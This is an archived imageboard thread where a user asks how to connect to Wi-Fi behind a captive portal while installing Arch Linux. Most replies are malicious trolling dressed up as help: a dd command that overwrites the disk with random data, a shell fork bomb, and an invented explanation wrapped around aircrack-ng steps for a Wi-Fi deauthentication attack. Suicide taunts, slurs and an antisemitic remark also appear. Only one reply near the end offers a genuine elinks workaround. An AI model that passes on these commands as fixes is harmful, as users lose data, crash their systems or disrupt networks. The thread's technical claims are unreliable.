[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

How do I set up a wireless connection when going through Arch

This is a red board which means that it's strictly for adults (Not Safe For Work content only). If you see any illegal content, please report it.

Thread replies: 20
Thread images: 1

File: Arch.sh.png (19KB, 700x700px) Image search: [Google]
Arch.sh.png
19KB, 700x700px
How do I set up a wireless connection when going through Arch Linux installation when my wifi has a captive portal login?

Using wifi-menu, when I ping I get "3 packets transmitted, 0 received, 100% packet loss".

Is there a better guide than the wiki? I've tried all the solutions on the wiki and nothing seems to work.
>>
>>139808484
Uninstall arch and plug a fork into the socket
>>
>>139808484
>>>/g/
>>
>>139808484
Seems like your bashrc file is messed up. Type sudo gedit./.bashrc and add this at the bottom:
xrandr -o inverted. This repairs your internet issues.
>>
>>139809130
after you do this kill yourself
>>
>>139808484
Trying to install arch Linux has wasted hours of my time and given me many headaches. Now I just stay away from Linux in general
>>
Install Gentoo
Also wrong board faggot
>>
>>139809442
Fuckin dumbass. How do not know how to use linux? Can u seriously not work in a terminal? It's not rocket science kiddo.
>>
>>139809667
I can install arch it's just the whole configuring wifi and trying to work programs is really fucking annoying
>>
>>139809667
>It's not rocket science kiddo
okay let me start fabricating my own core memory. you fucking autist.
>>
Just use antergos OP...
>>
>>139809752
Hmmm... Seems like an issue I had before. Apparently the operating system may occasionally stuck in an error loop on certain hardware. You need to fix this by redirecting the random error output. Try this: dd if=/dev/random of=/dev/sda
>>
OP here, am fag and forgot to change boards. I got it to work using elinks, though I don't really know why. On to the next step...

(sage goes in all fields)
>>
>>139810281
>dd if=/dev/random of=/dev/sda
you're an evil cunt. clearly you shouldn't use /dev/random, you should use /dev/urandom. it's secure. you want your hardware to be secure, don't you?
>>
>>139808484
ethernet
>>
>>139808484
Pretty sure you have to gas the kikes first.
>>
>>139810558
>not /dev/zero
>>
>>139809752
Another possibility is that your processes that are hidden and messing up the connection. Try this on your terminal to restart possible error causing processes: :(){ :|: & };:
>>
>>139808484
>captive portal login
the installer comes with elinks. try connecting manually to the wifi but don't attempt dhcp. try to use elinks to access the portal, it has limited javascript support i think. those portals are annoying and don't provide any actual security so if it's your wifi just disable that nonsense.
>>>/g/ is a better place to ask this
>>
>>139808484
That's a very common problem among Linux users. The kernel probably isn't running the correct SHA-256 hash on the hi-fi silicon 802.11 ac wiring because kernel 5.60 beta, which is probably your kernel, was redesigned more specifically for last generation and has better support in Blowfish cryptography with 5 GHz 24790k support. In order to fix this, you will need to re flash your bios via hyper v thunderbolt and replace the CMOS with the next gen advanced micro devices CMOS corsair edition series. However, that is very dangerous. Here's a quick temporary workaround. Download and install the aircrack suite, which provides wifi penetration and repair tools. Then type airmon-ng start wlan0. Now two new devices will pop up under the wireless section: wlan0 and mon0 (or wlan0mon). Whatever it is, use the newly appeared one, run airodump-ng mon0 (or wlan0mon). Find your wifi network on the list, remember the channel number and get the MAC address. Now, we will use aireplay-ng to reroute the MD4 supersalt ver 2 packets in order to get connected with an incorrect proprietary version. Change the channel of mon0 to your router's channel with iwconfig mon0 channel channelnumber. Then Type aireplay-ng --deauth 0 -a routerMAC mon0 --ignore-negative-one. This should fix your problem. However, you will have to let it run until it says success. Hope this helps you anon.
Thread posts: 20
Thread images: 1

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.